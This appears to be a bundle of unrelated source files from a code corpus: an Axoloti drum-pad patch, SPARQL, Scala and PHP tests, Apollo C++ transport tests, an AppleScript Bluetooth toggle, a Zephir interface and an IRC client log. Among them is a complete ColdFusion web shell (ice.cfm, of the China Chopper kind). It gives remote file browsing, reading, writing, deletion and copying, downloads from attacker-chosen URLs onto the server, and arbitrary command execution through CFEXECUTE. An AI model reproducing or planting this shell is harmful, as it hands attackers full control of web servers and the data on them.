uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 5 Velocity" x="322" y="196"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_6" x="112" y="224"> <params/> <attribs> <spinner attributeName="note" value="41"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 6 Trigger" x="238" y="238"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 6 Velocity" x="322" y="238"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_7" x="14" y="266"> <params/> <attribs> <spinner attributeName="note" value="42"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 7 Trigger" x="238" y="280"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 7 Velocity" x="322" y="280"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_8" x="112" y="308"> <params/> <attribs> <spinner attributeName="note" value="43"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 8 Trigger" x="238" y="322"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 8 Velocity" x="322" y="322"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_9" x="14" y="350"> <params/> <attribs> <spinner attributeName="note" value="44"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 9 Trigger" x="238" y="364"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 9 Velocity" x="322" y="364"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_10" x="112" y="392"> <params/> <attribs> <spinner attributeName="note" value="45"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 10 Trigger" x="238" y="406"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 10 Velocity" x="322" y="406"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_11" x="14" y="434"> <params/> <attribs> <spinner attributeName="note" value="46"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 11 Trigger" x="238" y="448"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 11 Velocity" x="322" y="448"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_12" x="112" y="476"> <params/> <attribs> <spinner attributeName="note" value="47"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 12 Trigger" x="238" y="490"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 12 Velocity" x="322" y="490"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_13" x="14" y="518"> <params/> <attribs> <spinner attributeName="note" value="48"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 13 Trigger" x="238" y="532"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 13 Velocity" x="322" y="532"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_14" x="112" y="560"> <params/> <attribs> <spinner attributeName="note" value="49"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 14 Trigger" x="238" y="574"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 14 Velocity" x="322" y="574"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_15" x="14" y="602"> <params/> <attribs> <spinner attributeName="note" value="50"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 15 Trigger" x="238" y="616"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 15 Velocity" x="322" y="616"> <params/> <attribs/> </obj> <obj type="midi/in/keyb note" uuid="ac0cd98e6c0373b7be73d25900342a62ebcf5f" name="keyb_16" x="112" y="644"> <params/> <attribs> <spinner attributeName="note" value="51"/> </attribs> </obj> <obj type="patch/outlet b" uuid="191792f616d4835dba0b55375474a12942e5bcbd" name="PAD 16 Trigger" x="238" y="658"> <params/> <attribs/> </obj> <obj type="patch/outlet f" uuid="d18a9a550bcaaebac94e25983bd0e27dbfd7233c" name="PAD 16 Velocity" x="322" y="658"> <params/> <attribs/> </obj> <nets> <net> <source obj="keyb_1" outlet="gate"/> <dest obj="PAD 1 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_1" outlet="velocity"/> <dest obj="PAD 1 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_2" outlet="gate"/> <dest obj="PAD 2 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_2" outlet="velocity"/> <dest obj="PAD 2 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_3" outlet="gate"/> <dest obj="PAD 3 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_3" outlet="velocity"/> <dest obj="PAD 3 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_4" outlet="gate"/> <dest obj="PAD 4 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_4" outlet="velocity"/> <dest obj="PAD 4 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_5" outlet="gate"/> <dest obj="PAD 5 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_5" outlet="velocity"/> <dest obj="PAD 5 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_6" outlet="gate"/> <dest obj="PAD 6 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_6" outlet="velocity"/> <dest obj="PAD 6 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_7" outlet="gate"/> <dest obj="PAD 7 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_7" outlet="velocity"/> <dest obj="PAD 7 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_8" outlet="gate"/> <dest obj="PAD 8 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_8" outlet="velocity"/> <dest obj="PAD 8 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_9" outlet="gate"/> <dest obj="PAD 9 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_9" outlet="velocity"/> <dest obj="PAD 9 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_10" outlet="gate"/> <dest obj="PAD 10 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_10" outlet="velocity"/> <dest obj="PAD 10 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_11" outlet="gate"/> <dest obj="PAD 11 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_11" outlet="velocity"/> <dest obj="PAD 11 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_12" outlet="gate"/> <dest obj="PAD 12 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_12" outlet="velocity"/> <dest obj="PAD 12 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_13" outlet="gate"/> <dest obj="PAD 13 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_13" outlet="velocity"/> <dest obj="PAD 13 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_14" outlet="gate"/> <dest obj="PAD 14 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_14" outlet="velocity"/> <dest obj="PAD 14 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_15" outlet="gate"/> <dest obj="PAD 15 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_15" outlet="velocity"/> <dest obj="PAD 15 Velocity" inlet="outlet"/> </net> <net> <source obj="keyb_16" outlet="gate"/> <dest obj="PAD 16 Trigger" inlet="outlet"/> </net> <net> <source obj="keyb_16" outlet="velocity"/> <dest obj="PAD 16 Velocity" inlet="outlet"/> </net> </nets> <settings> <subpatchmode>no</subpatchmode> <MidiChannel>10</MidiChannel> <HasMidiChannelSelector>true</HasMidiChannelSelector> <NPresets>8</NPresets> <NPresetEntries>32</NPresetEntries> <NModulationSources>8</NModulationSources> <NModulationTargetsPerSource>8</NModulationTargetsPerSource> <Author>Rasheed Abdul-Aziz</Author> <License>MIT</License> </settings> <notes><![CDATA[Drum Pads on the Beat Step Pro.]]></notes> <windowPos> <x>509</x> <y>167</y> <width>459</width> <height>850</height> </windowPos> </patch-1.0>
NetLinx
3
bunniesandbeatings/instaments
objects/controllers/bsp/drum_pads.axs
[ "MIT" ]
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#> PREFIX owl: <http://www.w3.org/2002/07/owl#> PREFIX : <http://example.org/test#> SELECT * WHERE { ?C rdfs:subClassOf [ a owl:Restriction ; owl:onProperty :hasChild ; owl:someValuesFrom owl:Thing ] . }
SPARQL
4
alpano-unibz/ontop
test/sparql-compliance/src/test/resources/testcases-dawg-sparql-1.1/entailment/parent9.rq
[ "Apache-2.0" ]
trait CoSet[U, +A <: U] extends CoSetLike[U, A, ({type S[A1 <: U] = CoSet[U, A1]})#S] trait CoSetLike[U, +A <: U, +This[X] <: CoSetLike[U, A, This] with CoSet[U, A]] { implicitly[CoSet[U, Any]] // should report "implicit not found" // was triggering a StackOverflow as getClassParts looped over // the steam of types: // CoSet#6940[U#6966,A1#22868] // CoSet#6940[U#6966,A1#22876] // CoSet#6940[U#6966,A1#...] }
Scala
4
jamesanto/scala
test/files/neg/t6528.scala
[ "Apache-2.0" ]
--TEST-- Bug #81681 (ReflectionEnum throwing exceptions) --FILE-- <?php enum Status { case Draft; case Published; case Archived; } $reflectionEnum = new \ReflectionEnum('\Status'); var_dump($reflectionEnum->isInstantiable()); var_dump($reflectionEnum->isCloneable()); ?> --EXPECT-- bool(false) bool(false)
PHP
3
NathanFreeman/php-src
ext/reflection/tests/bug81681.phpt
[ "PHP-3.01" ]
<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9); for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B"> <CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/"; O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9); If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C"> <CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#"> <CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0; if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();} DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" /> <cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) /> <cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) /> <cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#"> <CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1); h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));} F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D"> <CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S); df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles(); for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{ cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE> <CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J"> <CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT> FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2; For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT> <CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M"> <CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" /> </CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH> </CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>
ColdFusion
2
laotun-s/webshell
caidao-shell/ice.cfm
[ "MIT" ]
/****************************************************************************** * Copyright 2018 The Apollo Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *****************************************************************************/ #include <string> #include <utility> #include "fastcdr/Cdr.h" #include "fastcdr/exceptions/BadParamException.h" #include "gtest/gtest.h" #include "cyber/common/global_data.h" #include "cyber/common/log.h" #include "cyber/transport/qos/qos_profile_conf.h" #include "cyber/transport/rtps/attributes_filler.h" #include "cyber/transport/rtps/participant.h" #include "cyber/transport/rtps/underlay_message.h" #include "cyber/transport/rtps/underlay_message_type.h" namespace apollo { namespace cyber { namespace transport { TEST(AttributesFillerTest, fill_in_pub_attr_test) { QosProfile qos; AttributesFiller filler; eprosima::fastrtps::PublisherAttributes attrs; qos.set_history(QosHistoryPolicy::HISTORY_KEEP_LAST); qos.set_durability(QosDurabilityPolicy::DURABILITY_TRANSIENT_LOCAL); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_BEST_EFFORT); qos.set_mps(32); filler.FillInPubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_LAST_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::TRANSIENT_LOCAL_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::BEST_EFFORT_RELIABILITY_QOS, attrs.qos.m_reliability.kind); AINFO << "heartbeat period: " << attrs.times.heartbeatPeriod.seconds << ", " << attrs.times.heartbeatPeriod.fraction; qos.set_depth(1024); attrs.topic.historyQos.depth = 512; filler.FillInPubAttr("channel", qos, &attrs); AINFO << qos.depth() << ", " << QosProfileConf::QOS_HISTORY_DEPTH_SYSTEM_DEFAULT << ", " << attrs.topic.historyQos.depth; EXPECT_EQ(qos.depth(), attrs.topic.historyQos.depth); qos.set_history(QosHistoryPolicy::HISTORY_KEEP_ALL); qos.set_durability(QosDurabilityPolicy::DURABILITY_VOLATILE); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_RELIABLE); qos.set_mps(65); filler.FillInPubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_ALL_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::VOLATILE_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::RELIABLE_RELIABILITY_QOS, attrs.qos.m_reliability.kind); AINFO << "heartbeat period: " << attrs.times.heartbeatPeriod.seconds << ", " << attrs.times.heartbeatPeriod.fraction; qos.set_history(QosHistoryPolicy::HISTORY_SYSTEM_DEFAULT); qos.set_durability(QosDurabilityPolicy::DURABILITY_SYSTEM_DEFAULT); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_SYSTEM_DEFAULT); qos.set_mps(1025); filler.FillInPubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_ALL_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::VOLATILE_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::RELIABLE_RELIABILITY_QOS, attrs.qos.m_reliability.kind); AINFO << "heartbeat period: " << attrs.times.heartbeatPeriod.seconds << ", " << attrs.times.heartbeatPeriod.fraction; qos.set_mps(0); filler.FillInPubAttr("channel", qos, &attrs); AINFO << "heartbeat period: " << attrs.times.heartbeatPeriod.seconds << ", " << attrs.times.heartbeatPeriod.fraction; } TEST(AttributesFillerTest, fill_in_sub_attr_test) { QosProfile qos; AttributesFiller filler; eprosima::fastrtps::SubscriberAttributes attrs; qos.set_history(QosHistoryPolicy::HISTORY_KEEP_LAST); qos.set_durability(QosDurabilityPolicy::DURABILITY_TRANSIENT_LOCAL); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_BEST_EFFORT); qos.set_mps(32); filler.FillInSubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_LAST_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::TRANSIENT_LOCAL_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::BEST_EFFORT_RELIABILITY_QOS, attrs.qos.m_reliability.kind); qos.set_depth(1024); attrs.topic.historyQos.depth = 512; filler.FillInSubAttr("channel", qos, &attrs); EXPECT_EQ(qos.depth(), attrs.topic.historyQos.depth); qos.set_history(QosHistoryPolicy::HISTORY_KEEP_ALL); qos.set_durability(QosDurabilityPolicy::DURABILITY_VOLATILE); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_RELIABLE); qos.set_mps(65); filler.FillInSubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_ALL_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::VOLATILE_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::RELIABLE_RELIABILITY_QOS, attrs.qos.m_reliability.kind); qos.set_history(QosHistoryPolicy::HISTORY_SYSTEM_DEFAULT); qos.set_durability(QosDurabilityPolicy::DURABILITY_SYSTEM_DEFAULT); qos.set_reliability(QosReliabilityPolicy::RELIABILITY_SYSTEM_DEFAULT); qos.set_mps(1025); filler.FillInSubAttr("channel", qos, &attrs); EXPECT_EQ(eprosima::fastrtps::KEEP_ALL_HISTORY_QOS, attrs.topic.historyQos.kind); EXPECT_EQ(eprosima::fastrtps::VOLATILE_DURABILITY_QOS, attrs.qos.m_durability.kind); EXPECT_EQ(eprosima::fastrtps::RELIABLE_RELIABILITY_QOS, attrs.qos.m_reliability.kind); } TEST(ParticipantTest, participant_test) { eprosima::fastrtps::ParticipantListener listener; eprosima::fastrtps::ParticipantListener listener1; } TEST(UnderlayMessageTest, underlay_message_test) { UnderlayMessage message; message.timestamp(1024); int32_t& t = message.timestamp(); t = 256; EXPECT_EQ(256, message.timestamp()); message.seq(1024); int32_t& seq = message.seq(); seq = 256; EXPECT_EQ(256, message.seq()); message.data("data"); std::string& data = message.data(); data = "data string"; EXPECT_EQ(data, message.data()); message.data(std::forward<std::string>("data forward")); EXPECT_EQ("data forward", message.data()); message.datatype("datatype"); std::string& datatype = message.datatype(); datatype = "datatype string"; EXPECT_EQ(datatype, message.datatype()); message.datatype("datatype assign"); EXPECT_EQ("datatype assign", message.datatype()); message.datatype(std::forward<std::string>("datatype forward")); EXPECT_EQ("datatype forward", message.datatype()); const UnderlayMessage const_message(message); std::string data1 = const_message.data(); std::string datatype1 = const_message.datatype(); EXPECT_EQ(256, const_message.timestamp()); EXPECT_EQ(256, const_message.seq()); EXPECT_EQ("data forward", const_message.data()); EXPECT_EQ("datatype forward", const_message.datatype()); UnderlayMessage message2; message2 = message; EXPECT_EQ(256, message2.timestamp()); EXPECT_EQ(256, message2.seq()); EXPECT_EQ("data forward", message2.data()); EXPECT_EQ("datatype forward", message2.datatype()); UnderlayMessage message3; message3 = std::forward<UnderlayMessage>(message2); EXPECT_EQ(256, message3.timestamp()); EXPECT_EQ(256, message3.seq()); EXPECT_EQ("data forward", message3.data()); EXPECT_EQ("datatype forward", message3.datatype()); UnderlayMessage message4(message3); EXPECT_EQ(256, message4.timestamp()); EXPECT_EQ(256, message4.seq()); EXPECT_EQ("data forward", message4.data()); EXPECT_EQ("datatype forward", message4.datatype()); UnderlayMessage message5(std::forward<UnderlayMessage>(message4)); EXPECT_EQ(256, message5.timestamp()); EXPECT_EQ(256, message5.seq()); EXPECT_EQ("data forward", message5.data()); EXPECT_EQ("datatype forward", message5.datatype()); EXPECT_EQ("", message4.data()); EXPECT_EQ("", message4.datatype()); } } // namespace transport } // namespace cyber } // namespace apollo
C++
4
jzjonah/apollo
cyber/transport/rtps/rtps_test.cc
[ "Apache-2.0" ]
#!/usr/bin/osascript # @raycast.title Toggle Bluetooth # @raycast.author Vincent Dörig # @raycast.authorURL https://github.com/vincentdoerig # @raycast.description Toggle your Bluetooth connection. # @raycast.icon images/bluetooth.png # @raycast.mode silent # @raycast.packageName System # @raycast.schemaVersion 1 # set this variable to the equivalent of "Control Center" in your system language set ControlCenterWindow to "Control Center" tell application "System Events" tell process "ControlCenter" click menu bar item "Bluetooth" of menu bar 1 set BluetoothSwitch to checkbox "Bluetooth" of group 1 of window ControlCenterWindow click BluetoothSwitch delay 1 if value of BluetoothSwitch is 0 then do shell script "echo Bluetooth turned off" else do shell script "echo Bluetooth turned on" end if end tell end tell
AppleScript
4
tanaynistala/script-commands
commands/system/bluetooth.template.applescript
[ "MIT" ]
/** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon\Assets; /** * Interface for custom Phalcon\Assets filters */ interface FilterInterface { /** * Filters the content returning a string with the filtered content */ public function filter(string! content) -> string; }
Zephir
4
tidytrax/cphalcon
phalcon/Assets/FilterInterface.zep
[ "BSD-3-Clause" ]
2016-03-02 15:21:54 > fsociety (whoami@localhost) has joined &jabber 2016-03-02 15:21:54 - Channel &jabber: 4 nicks (2 ops, 0 halfops, 2 voices, 0 normals) 2016-03-02 15:22:11 @fsociety channel &jabber set 2016-03-02 15:22:11 @root account is empty 2016-03-02 15:22:11 @root auto_join = `false' 2016-03-02 15:22:11 @root fill_by = `protocol' 2016-03-02 15:22:11 @root group is empty 2016-03-02 15:22:11 @root protocol = `jabber' 2016-03-02 15:22:11 @root show_users = `online+,special%,away' 2016-03-02 15:22:11 @root type = `control' 2016-03-02 15:22:59 @fsociety channel &jabber set account jabber 2016-03-02 15:22:59 @root account = `jabber' 2016-03-02 15:23:20 @fsociety chanell &jabber set show_users online+,away,offline 2016-03-02 15:23:20 @root Unknown command: chanell. Please use help commands to get a list of available commands. 2016-03-02 15:23:29 @fsociety channel &jabber set show_users online+,away,offline 2016-03-02 15:23:29 > gunter (gunter@error418.info) has joined &jabber 2016-03-02 15:23:29 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-02 15:23:29 > jimk (jimk@error418.info) has joined &jabber 2016-03-02 15:23:29 > landi (landi@error418.info) has joined &jabber 2016-03-02 15:23:29 > munin (munin@error418.info) has joined &jabber 2016-03-02 15:23:29 @root show_users = `online+,away,offline' 2016-03-02 15:23:49 @fsociety channel &jabber set show_users online%,away+,offline 2016-03-02 15:23:49 - Mode &jabber [+h-v error406 error406] by localhost 2016-03-02 15:23:49 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-02 15:23:49 @root show_users = `online%,away+,offline' 2016-03-02 15:24:05 @fsociety channel &jabber set auto_join true 2016-03-02 15:24:05 @root auto_join = `true' 2016-03-02 15:24:12 @fsociety channel &jabber set 2016-03-02 15:24:12 @root account = `jabber' 2016-03-02 15:24:12 @root auto_join = `true' 2016-03-02 15:24:12 @root fill_by = `protocol' 2016-03-02 15:24:12 @root group is empty 2016-03-02 15:24:12 @root protocol = `jabber' 2016-03-02 15:24:12 @root show_users = `online%,away+,offline' 2016-03-02 15:24:12 @root type = `control' 2016-03-02 15:49:40 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-02 15:49:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 15:50:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 16:40:28 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-02 16:40:28 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 16:41:10 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 17:16:10 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-02 17:16:10 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 17:16:21 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 17:29:13 < munin (munin@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < heeroyuy (heeroyuy@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < jimk (jimk@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < landi (landi@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < gunter (gunter@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < error406 (error406@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:29:13 < turtleshow (turtleshow@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-02 17:30:26 > error406 (error406@error418.info) has joined &jabber 2016-03-02 17:30:26 > gunter (gunter@error418.info) has joined &jabber 2016-03-02 17:30:26 > landi (landi@error418.info) has joined &jabber 2016-03-02 17:30:26 > jimk (jimk@error418.info) has joined &jabber 2016-03-02 17:30:26 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 17:30:26 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-02 17:30:26 > munin (munin@error418.info) has joined &jabber 2016-03-02 17:30:27 - Mode &jabber [+h error406] by localhost 2016-03-02 17:30:27 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 17:44:03 - Mode &jabber [-h+v error406 error406] by localhost 2016-03-02 17:46:44 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-02 17:46:44 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 17:46:56 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 17:56:52 - irc: disconnected from server 2016-03-02 19:58:15 > fsociety (whoami@localhost) has joined &jabber 2016-03-02 19:58:15 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-02 19:58:22 > error406_ (error406@error418.info) has joined &jabber 2016-03-02 19:58:22 > gunter (gunter@error418.info) has joined &jabber 2016-03-02 19:58:22 > landi (landi@error418.info) has joined &jabber 2016-03-02 19:58:22 > jimk (jimk@error418.info) has joined &jabber 2016-03-02 19:58:22 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 19:58:22 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-02 19:58:22 > munin (munin@error418.info) 